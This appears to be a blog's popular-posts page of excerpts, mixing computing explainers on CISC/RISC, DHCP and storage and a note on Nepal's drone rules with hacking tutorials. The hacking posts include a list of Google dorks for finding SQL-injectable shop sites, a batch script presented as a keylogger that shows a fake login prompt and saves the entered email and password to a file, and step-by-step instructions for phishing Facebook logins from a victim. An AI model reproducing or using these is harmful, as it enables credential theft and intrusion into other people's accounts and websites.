Skip to main content

Posts

Popular posts from this blog

CISC VS RISC computers (all details)

CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. T...

DHCP principle , DHCP server and client communication process

1. Explain with principle: the DHCP server and client communication process DHCP stands for Dynamic Host Configuration Protocol. It handles the automatic assignment of IP addresses and other configuration settings for devices on your network. DHCP automates Network and Sharing Center in your control panel. This is especially good for people who have laptops, aren't hooked up to the Internet all the time and often move from place to place with their portable devices. They can simply get a new IP address as needed without having to do it manually. DHCP is designed to make the assignment of IP addresses and other network configuration information faster and easier. DHCP is a protocol that uses Level 4 on the OSI model. It communicates using User Datagram Protocol (UDP) datagrams through UDP Port 68. DHCP works with most current and past Windows clients, and also Linux, Macintosh, and many network-capable printers. DHCP is desi...

Google Dorks for sql injection | new 2017 |

default.php?catID= cart_additem.php?id= item_show.php?code_no= details.php?BookID= item.php?prodtype= inurl:php?id+site:it+show inurl:php?id+site:fr+show inurl:php?id+site:dk+shop inurl:php?id+site:pt+shop inurl:php?id+site:za+shop inurl:php?id+site:fi+shop acclogin.php?cartID= addToCart.php?idProduct= inurl:php?id+site:es+shop inurl:php?id+site:ro+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+checkout List.php?CatID= inurl:php?id+site:au+product inurl:php?id+site:au+succes inurl:php?id+site:uk+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+shop inurl:php?id+site:it+shop inurl:php?id+site:de+shop inurl:php?id+site:pl+shop itemdetail.php?item= inurl:php?id+site:au+checkout

CISC VS RISC computers (all details)

CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. T...

what are Auxiliary Storage Devices ? (squential vs Random auxiliary storage)

              Auxiliary storage, secondary storage, or external storage are devices that store noncritical system data like documents, multimedia and programs, which are used whenever they are required. These files are invoked from the auxiliary storage when needed and then transferred to the primary storage so that the CPU can process them. The results of the process can also be sent back to the auxiliary storage for later retrieval. These storage devices hold data and programs for future use and are considered nonvolatile storage that retains information even when power is not available. The best example of auxiliary storage is hard disk drives and optical storage media like CDs, DVDs, and Blue ray. Other auxiliary storage belongs to the peripheral devices category as well, such as flash drives and any type of memory card. ž   Auxiliary storage devices can be categorized in two types based on data access.  1. Sequential Access ...

How to create Keylogger using Notepad for hacking ?

Keylogger is an computer program program that records every keystroke made by a computer user ,especially in order to gain fraudulent acess to passwords and other confidential information. use the following steps : Step 1:     First of all open notepad and type the following code : @echo off color a title Login cls echo Please Enter Your Email Address And Password echo. echo. echo %date% >> Log.txt set /p user=Username: set /p pass=Password: echo Username=”%user%” Password=”%pass%” >> Log.txt pause start >>Program Here<< cd “C:Logs” exit Step 2: Now save the file as logs.bat on your desktop : Step 3:    Now create a new folder named logs.(you must keep the name logs otherwise it won't work)  Cut the folder and paste to C drive . Step 4: test the log.bat by opening it. and open the folder and you will see the automatically saved logs in the folder.

Drones Laws in Nepal and How to get drones in Nepal ?

Drones In Nepal Documents needed 1 A filled form 2. Request letter This request letter should be written to Civil Aviation Authority of Nepal asking for permission to use. 3. A copy of Operation Specifications of Drone. 4. A copy of map of operation area. 5. Copy that shows latlong (latitude/Longitude) box of operation area. 6. No Objection/ Recommendation letter of concerned owner/Unit if operation area is over private/ Public place or property. If the operation area is on public property like roads, temples, etc you need to have a no objection letter from Road's Department and other such departments. 7. Letter from the concerned authority for security clearance or other clearance. This security clearance is taken from the operation areas' Police Headquarters General Nepal Drone Laws Drone use is allowed in Nepal, but there are several Nepal drone laws that need to be followed when flying in the country. Operators must ensure that they f...

How to hack facebook without password and login (100% working) 2017 (undetectable phishing site)

PROCESS:- 1. goto the site( z-shadow.co )  and signup 2. after that , login and copy the link that you will get from the facebook icon. 3. now send the copied link to your victim from any media like facebook 4. after the victim clicks the link goto the website( z-shadow.co ) and click on my Victims. 5. you get the username and passowrd there . 6. enjoy :) watch video:- https://www.youtube.com/watch?v=rkgR7-0prUk HAVE A LINUX MACHINE ?? here's another method for you :) :- https://www.youtube.com/watch?v=Sp4SGxzFQs0 catch me on facebook :-  https://www.facebook.com/anonymousnepale keywords: hack facebook 100%working method easily hack facebook hack facebook from mobile facebook hacking video